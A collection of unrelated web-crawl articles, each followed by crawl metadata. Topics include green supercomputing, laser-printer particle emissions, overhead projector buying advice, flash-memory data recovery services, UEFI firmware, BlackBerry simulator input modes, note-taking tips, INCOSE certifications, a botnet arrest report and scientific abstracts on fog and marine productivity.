UiT’s leadership in supercomputing is being matched by its mission to become the world’s leader in green High Performance Computing. Not only greening the data center itself but in recouping energy for district heating and having the supercomputing cluster be viewed as a community asset. | <urn:uuid:08d1105c-8c69-4579-9d2a-e992f46f0383> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/06/23/uit-recycles-supercomputing-power-aseteks-rackcdu/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00349-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93294 | 1,417 | 2.546875 | 3 |
Potentially hazardous particles emitted from common laser printers have been identified by an Australian university and other researchers.
The research, carried out at Queensland University of Technology, studied earlier findings that almost one-third of popular laser printers emitted large numbers of ultrafine particles.
The tiny particles are potentially dangerous to health because they can penetrate deep into the lungs.
The study found that ultrafine particles were formed from vapours produced when the printed image is fused to the paper.
In the printing process the printer toner is melted, and when it is hot certain compounds evaporate creating vapours. They then nucleate or condense in the air, forming ultrafine particles.
The particles are formed from both the paper and the hot toner. The hotter the printer gets, the greater the chance of the particles forming, the study said.
The study compared a high-emitting printer with a low-emitting printer.
Lower heat emission printers with efficient and regular temperature controls release fewer particles.
Sudden increases in temperature can add to the problem of particles being released, the university found. | <urn:uuid:e055ce47-8726-42d5-bc04-b72a37f353a3> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/2240088370/Researchers-identify-harmful-particles-released-by-printers | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00167-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93112 | 249 | 3.578125 | 4 |
If there is one place most of us have seen an overhead projector, it's in a classroom. These machines are valuable tools for teachers around the world as a simple, cost-effective way to bring images to life for students. In addition, overhead projectors are a standard tool in business, allowing professionals to create dynamic presentations with ease.
Types: There are two basic types of overhead projectors: transmissive and reflective. Transmissive projectors have the light source (bulb) in the base of the machine. The light is projected up through the glass stage of the projector, through a lens in the projector's head and then onto a projection screen. The light source for reflective projectors is in the head of the projector. The light shines down onto a reflective stage, and then reflects back up through the lens and onto a screen. Both types of projectors have their advantages. Transmissive projectors are usually brighter and the images are typically sharper, but they tend to be larger and heavier. If you want portability and will be only using transparency film, then a reflective projector is a good choice because they tend to be smaller and lighter in weight.
Before purchasing or using an overhead projector, it is a good idea to become familiar with the following components and options.
Lenses: Overhead projector lenses come in three different variations: singlet, doublet and triplet. The image projected will get sharper as your lens quality increases (singlet is the most basic lens; triplet is the most advanced). Not surprisingly, the price of an overhead projector increases with upgrades in lens quality. Also associated with the type of lens is the projector's focal length, which determines how close to or far from the screen the projector will focus.
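To illustrate how focal length ties to throw distance and image size, here is a thin-lens sketch in Python with invented but plausible numbers (a 10.5-inch stage and a 14-inch focal length); real projector optics involve multi-element lenses, so treat this as a first-order estimate only.

```python
def image_width(stage_width_in, focal_len_in, screen_dist_in):
    """Thin-lens estimate: 1/f = 1/u + 1/v gives the stage-to-lens
    distance u for a lens-to-screen distance v; magnification is v/u."""
    u = 1.0 / (1.0 / focal_len_in - 1.0 / screen_dist_in)
    return stage_width_in * (screen_dist_in / u)

# Illustrative numbers only: a 10.5 in stage, a 14 in focal length,
# and a screen 10 ft (120 in) away.
print(f"{image_width(10.5, 14, 120):.0f} in wide image")  # ~79 in
```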
Brightness: A projector's brightness is measured in lumens. Levels range from 1,700 to 11,000 lumens depending on the model you choose. Generally speaking, the type of image you are going to display (black/white or color), how far you intend to project your image, and the brightness of the room will dictate the desired brightness.
Lamps: Lamps are critical components of all overhead projectors and vary in type, life, wattage and cost. Some projectors offer high/low switches or are built to double the life of the lamp. These projectors can save you money in the future by reducing your lamp replacement costs. A lampchanger which allows the presenter to switch over to another lamp is also a very valuable feature. With a lampchanger, you can be assured that your meeting will continue if you do have a lamp fail.
Options: There are a variety of other options which are tailored to presenters who use LCD panels. These include built-in AC outlets on the projector and a "flip-in" magnifier. Two AC outlets are recommended on the projector: one for your LCD panel and the other for your computer. This makes setting up your equipment much easier. A flip-in magnifier is also a plus because it enlarges the projected image when using an LCD panel.
Stages on an overhead projector are the flat areas upon which transparency film is placed. Stages range from 10 inches to 11 1/4 inches, and it is important to ensure you have a stage that will work well with the size of your transparencies.
Lastly, an area which sometimes gets over looked is the warranty and ease of service for your overhead projector. A longer warranty is obviously the best choice, but also make sure that getting the equipment serviced is easy and convenient. Manufacturers who have servicing locations near you will make sure that you are not without your equipment for a long time.
Overhead projectors are versatile, cost-effective presentation tools that are easy to use and transport. The key to making sure that you purchase the correct model is to do a quick assessment of your needs and make sure that the model you're considering fills them.
Copyright © 1998 3M
| <urn:uuid:81fa1466-7edc-4c44-9ca4-0a29222f9515> | CC-MAIN-2017-04 | https://kintronics.com/3m/product_guide_overhead.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00377-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940987 | 846 | 3.25 | 3 |
Almost every portable data storage device today relies on NAND flash memory to do its job. You can find NAND chips inside your SSD, your phone, your thumb drive, and your memory cards. You can even find a NAND chip augmenting some of your traditional spinning-platter hard drives. At Gillware Data Recovery, we have NAND flash device recovery experts who can assist you with your flash media-related data recovery needs, regardless of what the device is.
An “exploded view” of a 32-GB Lexar USB drive that was brought to Gillware for flash device recovery
There are quite a few different forms of data storage that don’t involve moving parts. Some of these are volatile, meaning they can only hold data when they’re powered on. Obviously, this is a bad kind of storage to use in your USB thumb drive. A jump drive would be pretty useless if all of the data you put on it vanished as soon as you unplugged it from your computer! Other solid-state storage media is non-volatile, meaning it retains data after power stops flowing through it.
NAND flash memory is a form of non-volatile RAM (random-access memory). Many kinds of RAM, such as the RAM inside a computer, are volatile. But unlike the sticks of RAM you’d find in your computer, flash memory devices hold onto their data after they have been powered off. Over the years, flash memory technology has been refined until NAND flash memory reached a point at which it could compete with traditional spinning platter hard drives as a form of data storage. And it’s been gaining ground with astonishing speed ever since.
What is NAND flash memory?
NAND isn’t actually an acronym for anything, unlike most capitalized words in the computer science world. NAND flash memory gets part of its name from the “negative-AND” logic gate in digital circuitry. The individual cells in a NAND chip function in a way that resembles a NAND gate. While NAND isn’t the only kind of solid-state memory, or even the only kind of flash memory, it can be seen in just about every solid-state data storage device today.
Before flash memory, most forms of non-volatile memory were ROM (read-only memory). There were some forms of non-volatile RAM before flash memory was invented. But they were for the most part very impractical to use. “Flash” memory (so named because erasing the data from the chips reminded the creator’s colleague of a camera flash) was developed in the 1980s as an offshoot of EEPROM (electrically erasable programmable read-only memory).
EEPROM is a form of ROM. ROM is meant to be programmed once, then never altered again. EEPROM, however, could be completely erased using an electrical current, and then re-programmed. Flash memory, unlike EEPROM, could be programmed and erased on a block level. Individual blocks in a flash memory device could be programmed, erased, and re-programmed until the cells in the device wore out. Since portions of the flash memory chip could be programmed and reprogrammed, leaving the rest of the device alone, flash memory behaved more similarly to RAM than ROM.
How NAND Flash Works
You can think of a single NAND flash memory chip as equivalent to the spinning platters inside a hard drive. Platters are covered with a thin ferromagnetic coating and divided up into tiny magnetically-charged regions. The charge of these regions denotes whether each is a “0” or a “1”. In computer science, this is the smallest possible unit of data, the bit (short for “binary digit”). A NAND chip, on the other hand, is built out of cells. Each cell is a floating-gate transistor capable of storing a charge. Traditionally, each cell could only store a single bit, but multi-level cells can store more than one bit of data. These cells are strung out into long columns and packed together in rows.
EEPROM, flash memory’s progenitor, could be programmed, completely erased, and then re-programmed again. Every program-erase cycle caused some degradation to the actual cells in the EEPROM chip. Likewise, NAND cells have a limited number of program-erase cycles before they stop working. Depending on the cell type, modern NAND can typically endure anywhere from a few thousand (TLC) to around a hundred thousand (SLC) program-erase cycles per cell before failing. In modern SSDs, when this threshold is reached, the drive becomes read-only, as it can no longer be programmed or erased.
How Can I Lose Data from a Flash Memory Device?
The solid-state drive from an OCZ Trion 100 SSD flash device recovery case
Flash memory devices are more resilient than hard drives. A hard drive that falls a few feet onto a hardwood floor can be in critical condition; a flash drive that falls from the same height might be a little scuffed. Flash devices have become the portable storage medium of choice for precisely this reason. Your flash drive, SD card, and smartphone are constantly being jostled around and battered—while in use, no less. A traditional hard drive simply can’t take that kind of punishment, at least not for long.
But sometimes things just get taken too far. People get careless, mistakes get made. Flash drives or SD cards go through the wash. Your smartphone slips out of your pocket while you’re biking and hits the concrete, or gets way too close to a body of water for comfort. A power surge or faulty machinery can short out your thumb drive or solid state drive. And that’s just what can happen physically to your device. You can accidentally delete your files or reformat your partition. You can eject the device too early and corrupt your files or damage the boot sector. The cells in your device’s NAND chip can just go bad (usually at the worst possible time).
The technology behind flash memory is radically different from the technology that makes your hard drive work. But after you’ve gone above the bit level and into the realm of filesystems, things start to look about the same. Recovering data after accidentally reformatting or deleting files from a USB drive or SSD is usually somewhat hardware-agnostic. A solid state drive formatted for Windows has a partition table, superblock, and master file table just like a hard drive does, even though the underlying hardware is radically different.
Flash device recovery gets really tricky if there is something wrong with the flash device’s physical components or firmware. Flash devices have firmware just as hard drives do, although theirs works much differently. Firmware is the device’s “operating system” that acts as a mediator between the user and the storage medium. The firmware for USB drives and SD cards is simple. But SSD firmware is very complex. Solid state drives aren’t just faster than other storage media because they have NAND chips. Those chips are organized and used in a way that optimizes and speeds up their performance. There’s a lot of complex firmware regulating an SSD’s lightning-fast, Barry Allen-esque speed.
Many models of solid-state drives today are automatically encrypted on the hardware level. The encryption key is stored in the drive’s controller chip. If the controller cannot be resuscitated or the encryption key has been otherwise lost, recovering data from the SSD’s NAND chips is extremely difficult at best, and impossible without assistance from the original manufacturers. Gillware is at the forefront of researching data recovery methods from SSDs and working directly with SSD manufacturers to improve our abilities to recover from these SSDs.
NAND Chip Removal and Recovery
A flash memory storage device with two NAND chips that had to be removed for flash device recovery purposes
When a flash device has died, often the only way to access the data on it is to remove its NAND chip. Unlike a hard drive’s platters, NAND chips can be read outside of the device they belong to. All you need is a tool to desolder the chip from the board and a chip reader. But there’s a catch.
The data stored in your typical NAND chip is a jumbled mix of user data and system data. The controller chip takes the data coming to and from the NAND chip and makes sense of it. Without it, everything you read from your flash drive would be incomprehensible to you. And that’s what you get when you look at the raw data from your flash device’s NAND chip. At Gillware, we have skilled computer scientists who can reverse-engineer the controller’s job using custom emulation software. Our scientists can make sense of all that information and reassemble it into its proper form.
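As a simplified illustration of one early step in that reverse-engineering work, the sketch below separates each page's user-data area from its out-of-band (OOB) spare area in a raw chip dump. The 2,048+64 geometry is a common small-page layout but is an assumption here; the real geometry comes from the part's datasheet, and descrambling, de-interleaving and ECC correction still have to happen afterwards before any filesystem becomes visible.

```python
def strip_oob(raw_dump: bytes, page_data: int = 2048, page_oob: int = 64) -> bytes:
    """Drop the out-of-band (OOB) spare area of every page in a raw dump,
    keeping only the user-data areas. The 2048+64 layout is an assumed,
    common small-page geometry; check the part's datasheet."""
    page = page_data + page_oob
    out = bytearray()
    for off in range(0, len(raw_dump) - page + 1, page):
        out += raw_dump[off:off + page_data]
    return bytes(out)

# Hypothetical usage on a chip-off image:
# user_area = strip_oob(open("nand_dump.bin", "rb").read())
```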
Monolithic Flash Device File Recovery
Sometimes, though, the NAND chip isn’t easy to get at. Some kinds of USB drives, SD cards, and microSD cards are built as “monolithic flash devices”. While many flash memory devices keep their components relatively out in the open once you get past the case, monoliths hold their cards close to their chests. The NAND chip, controller chip, and the actual interface that connects your device to other devices is soldered into a single seemingly-impenetrable package. Our flash device data recovery engineers know how to access the NAND chips of even these monolithic flash devices. A hidden ball grid array offers a backdoor into these chips, but only for those who are as clever and resourceful as our flash device data recovery experts.
Why Choose Gillware for My Flash Device Recovery Needs?
Flash media comes in all shapes and sizes. Our experts can perform NAND flash device recovery procedures regardless of the form factor.
If you need data recovered from a USB flash drive, SD or microSD memory card, smartphone, tablet, or solid state drive, our technicians here at Gillware are your best bet. Our flash device recovery experts have experience with thousands of flash devices. Gillware works hard to stay on top of all of the latest advancements in flash memory and solid-state technology.
We offer our flash device recovery services free of any upfront charges. There are no evaluation fees for flash device data recovery, regardless of the device. For clients in the continental United States, we cover the cost of inbound shipping as well. Talk to one of our flash device recovery client advisers today to get a free estimate and a prepaid UPS shipping label.
At Gillware, no matter what work goes into your case, we only charge you for our services if we meet your recovery goals at an acceptable price to you. If we finish our free evaluation and present you with a price quote that is too high, you are free to back out without having to pay us a dime. We don’t charge you anything until we’ve finished our flash device recovery work—and only if we’re successful at recovering your critical data.
Ready to Have Gillware Assist You with Your Flash Device Recovery Needs?
Best-in-class engineering and software development staff
Gillware employs a full time staff of electrical engineers, mechanical engineers, computer scientists and software developers to handle the most complex data recovery situations and data solutions
Strategic partnerships with leading technology companies
Gillware is proud to be a recommended provider for Dell, Western Digital and other major hardware and software vendors. These partnerships allow us to gain unique insight into recovering from these devices.
RAID Array / NAS / SAN data recovery
Using advanced engineering techniques, we can recover data from large capacity, enterprise grade storage devices such as RAID arrays, network attached storage (NAS) devices and storage area network (SAN) devices.
Virtual machine data recovery
Thanks to special engineering and programming efforts, Gillware is able to recover data from virtualized environments with a high degree of success.
SOC 2 Type II audited
Gillware has been security audited to ensure data safety, meaning all our facilities, networks, policies and practices have been independently reviewed and determined as completely secure.
Facility and staff
Gillware’s facilities meet the SOC 2 Type II audit requirements for security to prevent entry by unauthorized personnel. All staff are pre-screened, background checked and fully instructed in the security protocol of the company.
We are a GSA contract holder.
We meet the criteria to be approved for use by government agencies
GSA Contract No.: GS-35F-0547W
Our entire data recovery process can be handled to meet HIPAA requirements for encryption, transfer and protection of e-PHI.
No obligation, no up-front fees, free inbound shipping and no-cost evaluations.
Gillware’s data recovery process is 100% financially risk free. We only charge if the data you want is successfully recovered.
Our pricing is 40-50% less than our competition.
By using cutting edge engineering techniques, we are able to control costs and keep data recovery prices low.
Instant online estimates.
By providing us with some basic information about your case, we can give you an idea of how much it will cost before you proceed with the recovery.
We only charge for successful data recovery efforts.
We work with you to define clear data recovery goals for our technicians, and only charge you upon successfully meeting these goals and recovering the data that is most important to you.
Gillware is trusted, reviewed and certified
Gillware has the seal of approval from a number of different independent review organizations, including SOC 2 Type II audit status, so our customers can be sure they’re getting the best data recovery service possible.
Gillware is a proud member of IDEMA and the Apple Consultants Network. | <urn:uuid:5b6a77f6-1378-4b1d-968e-eb7eefa5a1a1> | CC-MAIN-2017-04 | https://www.gillware.com/flash-device-recovery-services/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00285-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.929255 | 2,887 | 2.59375 | 3 |
Using mouse and touch inputs
You can restrict the simulator to accept only mouse inputs, only touch inputs, or both. In the controller, click Utilities and choose the type of input you would like from the drop-down menu.
Mouse Mode: Use both left and right clicks to represent default mouse clicks.
Touch Mode: Use left-clicks as single-touch events, and initiate multi-touch playback. Use right-clicks to specify touch points for multi-touch simulation.
Mixed Mode: Use left-clicks to represent default clicks and to initiate multi-touch playback. Use right-clicks to specify touch points for multi-touch simulation.
Using Touch Area inputs
The Touch Area is available to simulate devices that feature touch input other than a conventional touch screen. In the controller, click Touch Area.
The Touch Area supports two types of touch input: swipes and single taps.
- To perform a swipe, click and drag your mouse in the Touch Area.
- To perform a single tap, click your mouse button in the Touch Area. | <urn:uuid:39a64b27-70b4-49ac-83ec-768857a1b287> | CC-MAIN-2017-04 | http://developer.blackberry.com/devzone/develop/simulator/use_mouse_touch_inputs.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00193-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.803476 | 220 | 2.578125 | 3 |
You probably have started hearing the term UEFI a lot more lately along with all of the Windows 10 news, but what exactly is UEFI and why do you need it? UEFI stands for Unified Extensible Firmware Interface and is the next generation interface between the operating system and platform firmware. It replaces the antiquated legacy Basic Input/Output System, aka BIOS, that has been around for years. The UEFI standard was created by the UEFI consortium which consists of over 140 technology companies. UEFI was developed to allow support for new technologies during the booting process before the operating system loads. It is based on the EFI 1.10 specification that was originally published by Intel®.
BIOS has significant limitations as it relates to modern hardware. It is limited to 16-bit processor mode and 1 MB of addressable memory. UEFI, on the other hand, supports either 32-bit or 64-bit processor mode and can access all of the system’s memory. BIOS uses a Master Boot Record (MBR) for the disk partitioning scheme, whereas UEFI uses a newer partitioning scheme called the GUID Partition Table (GPT), which overcomes certain limitations of MBR. UEFI is able to support disk sizes greater than 2 TB, with a maximum disk and partition size of 8 zebibytes (ZiB), assuming 512-byte sectors.
BIOS disk partitioning (MBR):
UEFI disk partitioning (GPT):
However, converting an operating system’s drive partition from MBR to GPT is a destructive process, in which the new partitioning scheme needs to be formatted and the operating system needs to be completely reinstalled. Without the right process and tools, this can be an expensive manual effort.
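Before planning a conversion it helps to confirm how the machine currently boots. The Python sketch below relies on a widely used probe rather than an official API, so treat it as a best-effort check: on Windows, calling GetFirmwareEnvironmentVariable with a dummy name fails with ERROR_INVALID_FUNCTION (code 1) on legacy BIOS systems, while on Linux the /sys/firmware/efi directory exists only after a UEFI boot.

```python
import ctypes
import os
import platform

def boots_via_uefi() -> bool:
    """Best-effort firmware-type check (an assumption-laden sketch, not an
    official API): probe GetFirmwareEnvironmentVariableW on Windows, or look
    for /sys/firmware/efi on Linux."""
    if platform.system() == "Windows":
        kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
        # The call fails either way since the variable is bogus, but *how*
        # it fails is informative: ERROR_INVALID_FUNCTION (1) means the
        # firmware has no UEFI variable store, i.e. a legacy BIOS boot.
        kernel32.GetFirmwareEnvironmentVariableW(
            "", "{00000000-0000-0000-0000-000000000000}", None, 0
        )
        return ctypes.get_last_error() != 1
    return os.path.isdir("/sys/firmware/efi")

print("UEFI boot" if boots_via_uefi() else "Legacy BIOS boot")
```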
There are also several security benefits to running UEFI over BIOS on Windows 10 systems. Secure Boot protects the pre-boot process against rootkits and bootkits and requires no additional configuration (other than switching it on once the system is running UEFI). Once enabled, only signed boot loaders will be able to run. Other advantages of UEFI that your end users will appreciate are faster startup, shutdown, sleep and resume times compared to BIOS-based systems.
Lastly, some other key Windows 10 security features that require UEFI are: Credential Guard, Device Guard, Early Launch Anti-malware driver and Measured Boot. With the number of attacks and data breaches happening today, now is the time to get as secure as possible and take advantage (or at least put your environment in a position to take advantage) of all the security features that Windows 10 offers. Start today by migrating to Windows 10 and switching to UEFI as part of the process and leave BIOS where it belongs – in the past. | <urn:uuid:5b453e3b-c848-4fbe-9f3f-0a2192603fb3> | CC-MAIN-2017-04 | https://www.1e.com/blogs/2016/02/16/what-is-uefi-and-why-do-i-need-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00250-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938254 | 570 | 3.09375 | 3 |
Our recent paper, The State of International Co-operation on Cybercrime, explored what the international community has done, or tried to do, to tackle the cybercrime issue.
It’s quite rare to have the opportunity to highlight a great example of international co-operation, but according to V3.co.uk, a hacker responsible for one of the largest botnets ever created has been arrested thanks to an international effort.
The arrest comes months after Spanish police arrested three people, alleged to be the ringleaders of the operation.
The Mariposa botnet, which infected some 12 million computers and some HTC mobile devices, also impacted major banks and US Fortune 500 companies.
The virus allowed hackers to steal online banking and credit card details, as well as giving them access to other sensitive data.
This further arrest is a good example of what can be done when nations co-ordinate their fight against cybercrime, and it does serve as a warning to other hackers that their business is more risky than they may imagine.
However, at the moment the major ‘wins’ in the fight against cybercrime – at an international level – seem to be high profile attacks that target major corporations and financial institutions.
Which is somewhat inevitable given the work required to co-ordinate efforts across borders.
Somehow, this co-operation has to be encouraged and eased so that the vast number of smaller attacks, which target businesses and home users, can be dealt with.
Cross-posted from Network Box | <urn:uuid:6ff4e1f7-286a-4ad4-a03a-233c2117e0b0> | CC-MAIN-2017-04 | http://www.infosecisland.com/blogview/6204-Mariposa-Botnet-Arrest-via-International-Co-operation.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00094-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960191 | 307 | 2.515625 | 3 |
Head of the Class—Listening and Note-Taking
A big part of being a great learner is being a great listener. Of course, listening means much more than just hearing, which requires little to no effort at all. To hear something is to merely know that your ears are working properly. Listening refers to actively taking in a combination of auditory and visual information on a given topic and interpreting that data against what you already know about it. If you’re a good listener, there is literally no limit to what you can learn.
In interpersonal training environments such as classrooms and coaching, listening is usually complemented by note-taking. The vast amount of information transferred over an extended period of time necessitates recording the data in writing for reference later on. The notes reinforce learning by allowing learners to “re-listen” to a course in their minds long after it has taken place.
Needless to say, there’s a lot more to being a good listener and note-taker than simply knowing they’re important. Here are some steps you can take to improve your proficiency in these learning practices:
- Don’t Worry (Too Much) About Appearances: Obviously, you want to write legibly, but you shouldn’t be too concerned about the occasional misspelling or the aesthetic qualities of handwriting. This is an especially important point for older learners, who were taught at a very young age that their writing should be painstakingly neat. Just get the information down on the page during class. If it makes you feel better, recopy the notes afterwards when you have some time. In fact, this actually can help you retain the facts and concepts better.
- Mind the Gap: Luckily for learners, the brain moves faster than the instructor’s mouth can (about four times as fast, actually). You should exploit this gap by thinking, however briefly, about what’s been said prior to actually taking notes on it. This brings us to the next point…
- Capture the Big Ideas: Although the brain might move faster than the mouth, the hand does not. You’re not going to be able to write down everything that the lecturer says, so don’t even attempt it. Instead, try to record the most salient points. You can usually figure out what the most important information is by observing cues in the instructor’s speech and body language. Some teachers will be very explicit about what the key ideas are. Back in college, I had a couple of professors who would actually say in their lectures, “Be sure to write this down.” Some found this approach grating, but hey, it meant less effort for me!
- Write in Shorthand: Here’s an old trick that we journalists use. We’ve got to be able to write things down really quick, so we use shorthand whenever possible. Under this system, “level” becomes “lvl” and “association” becomes “ass.” (Please feel free to “crack” a booty joke here.) Fortunately, many younger learners who are serious instant- and text-messenger users are way ahead of the curve on this one. You don’t have to adopt the shorthand systems of grizzled old reporters or bratty, catty teenagers, though. Just use whatever works for you.
- Ask Questions: I’ll make this point by way of an anecdote. Back in the late 1940s, a couple of years after the successful use of A-bombs against Japan, a U.S. Navy admiral was assigned to the U.S. government’s atomic energy facility in Oak Ridge, Tenn. Scientists at this compound began to get irritated by the fact that he would ask the most elementary questions about nuclear power, and would make these inquiries over and over again. The people who had to explain these points repeatedly to him probably thought he was a little slow, but Hyman Rickover would later go on to become the father of the nuclear-powered navy, and owed much of his success to the fact that he wasn’t afraid to ask questions. You might not need to go as far as Rickover did in your quest for knowledge, but you should be sure to question something perplexing or unclear in order to understand it better. After all, asking questions enables you to frame your interlocutor’s explanation of something in your terms, and that makes listening that much easier. | <urn:uuid:a7c2e5c9-e7c4-4b20-98d0-e6c34eee0a3a> | CC-MAIN-2017-04 | http://certmag.com/head-of-the-class-listening-and-note-taking/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00002-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.967347 | 936 | 3.796875 | 4 |
INCOSE Systems Engineer Certs Offer Broad-Based Skills Validation
The job title of “systems engineer” might not sound all that glamorous at first, but once you consider that these IT pros work on complex systems that can include military aircraft and tanks, the job description suddenly becomes a lot more exciting.
As David Walden, Certified Systems Engineering Professional (CSEP) and INCOSE certification program manager, explained it, a systems engineer is an IT professional who heads up a development project on an intricate, software-intensive system. The system engineer has a broad role, looking at the entire system from conception to final disposal.
Take, for example, a nuclear reactor. Walden said the systems engineer would need to consider: “How do you dispose of that system safely, in a way that is both economical and good for the environment? How do you design the system so that it can be easily disassembled or reused or recycled?
“[Ultimately], a systems engineer looks at the whole problem and interfaces with the customer to determine what the real need is, envision what that system will be and then make sure it’s delivered and meets and exceeds [the] customer’s expectations,” Walden said.
“They translate all of those vague and soft-and-fuzzy stakeholder [requirements] — ‘I want a car that goes fast,’ ‘I want a rocket ship that can be launched 42 times’ — and then they work with the design engineers to make that a technical reality.”
Like many roles in the IT industry, there are organizations dedicated to training and certifying systems engineers. One such organization is the International Council on Systems Engineering (INCOSE). The professional society — created in 1990 — serves more than 6,000 professionals worldwide through its efforts to provide education and development opportunities to the global systems engineering community. INCOSE also establishes professional standards for the field.
Earlier this year, INCOSE upgraded its certification program to a three-tiered model. CSEP is the core certification for the program and validates a foundational level of systems engineering knowledge. This exam — created in 2004 — was upgraded in July in conjunction with the release of a new version of INCOSE’s Systems Engineering Handbook: Version 3.1. This upgrade gives the exam an international perspective, using international standard ISO/IEC 15288.
The CSEP is for professionals with a minimum bachelor’s degree in science or a technical subject, along with five years of experience in systems engineering. The degree also can be replaced by additional years of experience.
While upgrading the exam, INCOSE also added a specialization option in Department of Defense acquisition (CSEP Acq). This exam, which must be completed either concurrently or after passing the core CSEP exam, validates knowledge of systems engineering within a U.S. Department of Defense (DOD) acquisition environment. This certification is ideal for both current DOD professionals — to help them climb the career ladder — and industry professionals who work on government contracts and want to highlight their credibility and understanding of the DOD development process.
Also new to INCOSE certifications is the entry-level Associate Systems Engineering Professional (ASEP). The ASEP certification requires passing the same exam for the CSEP, as well as a bachelor’s degree, only the ASEP does not require an experience component. The ASEP is good for up to 10 years, by which time INCOSE expects the professional to have upgraded to CSEP status.
And for seasoned systems engineers, INCOSE will unveil its Expert Systems Engineering Professional (ESEP) certification in 2009.
“ESEP is targeted for a very limited audience of senior leaders in system engineering,” Walden explained. “And the way that we [will validate] that is not through a knowledge exam, but through a detailed interview process with the applicant and [his or her] references.”
In order for the credentials to be renewed — which is every three years for CSEP and five for ASEP — INCOSE certifications also require participation in continuing learning experiences within an allotted time period.
“The two main ways that you can earn PDUs [professional development units] are through taking some type of professional development such as university courses [or] internal training courses, [or] through volunteering,” which can include giving a paper at a systems engineering event or working on a professional standards committee, Walden said.
“The reason that we have a requirement for renewal is we want this to be a lifelong learning process,” he said.
– Mpolakowski, email@example.com “ | <urn:uuid:a56cc605-76bb-4ab8-8a4f-86783fd90549> | CC-MAIN-2017-04 | http://certmag.com/incose-systems-engineer-certs-offer-broad-based-skills-validation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00488-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951683 | 977 | 2.53125 | 3 |
Elias T.,EuraTechnologies |
Dupont J.-C.,Institute Pierre Simon Laplace |
Hammer E.,Paul Scherrer Institute |
Hammer E.,Grolimund Partner Ltd. |
And 5 more authors.
Atmospheric Chemistry and Physics | Year: 2015
The study assesses the contribution of aerosols to the extinction of visible radiation in the mist-fog-mist cycle. Relative humidity is large in the mist-fog-mist cycle, and aerosols most efficient in interacting with visible radiation are hydrated and compose the accumulation mode. Measurements of the microphysical and optical properties of these hydrated aerosols with diameters larger than 0.4 μm were carried out near Paris, during November 2011, under ambient conditions. Eleven mist-fog-mist cycles were observed, with a cumulated fog duration of 96 h, and a cumulated mist-fog-mist cycle duration of 240 h. In mist, aerosols grew by taking up water at relative humidities larger than 93%, causing a visibility decrease below 5 km. While visibility decreased down from 5 to a few kilometres, the mean size of the hydrated aerosols increased, and their number concentration (Nha) increased from approximately 160 to approximately 600 cmg'3. When fog formed, droplets became the strongest contributors to visible radiation extinction, and liquid water content (LWC) increased beyond 7 mg mg'3. Hydrated aerosols of the accumulation mode co-existed with droplets, as interstitial non-activated aerosols. Their size continued to increase, and some aerosols achieved diameters larger than 2.5 μm. The mean transition diameter between the aerosol accumulation mode and the small droplet mode was 4.0 ± 1.1 μm. Nha also increased on average by 60 % after fog formation. Consequently, the mean contribution to extinction in fog was 20 ± 15% from hydrated aerosols smaller than 2.5 μm and 6 ± 7% from larger aerosols. The standard deviation was large because of the large variability of Nha in fog, which could be smaller than in mist or 3 times larger.
The particle extinction coefficient in fog can be computed as the sum of a droplet component and an aerosol component, which can be approximated by 3.5 Nha (Nha in cmg'3 and particle extinction coefficient in Mmg'1. We observed an influence of the main formation process on Nha, but not on the contribution to fog extinction by aerosols. Indeed, in fogs formed by stratus lowering (STL), the mean Nha was 360 ± 140 cmg'3, close to the value observed in mist, while in fogs formed by nocturnal radiative cooling (RAD) under cloud-free sky, the mean Nha was 600 ± 350 cmg'3. But because visibility (extinction) in fog was also lower (larger) in RAD than in STL fogs, the contribution by aerosols to extinction depended little on the fog formation process. Similarly, the proportion of hydrated aerosols over all aerosols (dry and hydrated) did not depend on the fog formation process.
Measurements showed that visibility in RAD fogs was smaller than in STL fogs due to three factors: (1) LWC was larger in RAD than in STL fogs, (2) droplets were smaller, (3) hydrated aerosols composing the accumulation mode were more numerous. © Author(s) 2015. CC Attribution 3.0 License. Source
Laufkotter C.,ETH Zurich |
Laufkotter C.,Princeton University |
Vogt M.,ETH Zurich |
Gruber N.,ETH Zurich |
And 18 more authors.
Biogeosciences | Year: 2015
Past model studies have projected a global decrease in marine net primary production (NPP) over the 21st century, but these studies focused on the multi-model mean rather than on the large inter-model differences. Here, we analyze model-simulated changes in NPP for the 21st century under IPCC's high-emission scenario RCP8.5. We use a suite of nine coupled carbon-climate Earth system models with embedded marine ecosystem models and focus on the spread between the different models and the underlying reasons. Globally, NPP decreases in five out of the nine models over the course of the 21st century, while three show no significant trend and one even simulates an increase. The largest model spread occurs in the low latitudes (between 30° S and 30° N), with individual models simulating relative changes between-25 and +40 %. Of the seven models diagnosing a net decrease in NPP in the low latitudes, only three simulate this to be a consequence of the classical interpretation, i.e., a stronger nutrient limitation due to increased stratification leading to reduced phytoplankton growth. In the other four, warming-induced increases in phytoplankton growth outbalance the stronger nutrient limitation. However, temperature-driven increases in grazing and other loss processes cause a net decrease in phytoplankton biomass and reduce NPP despite higher growth rates. One model projects a strong increase in NPP in the low latitudes, caused by an 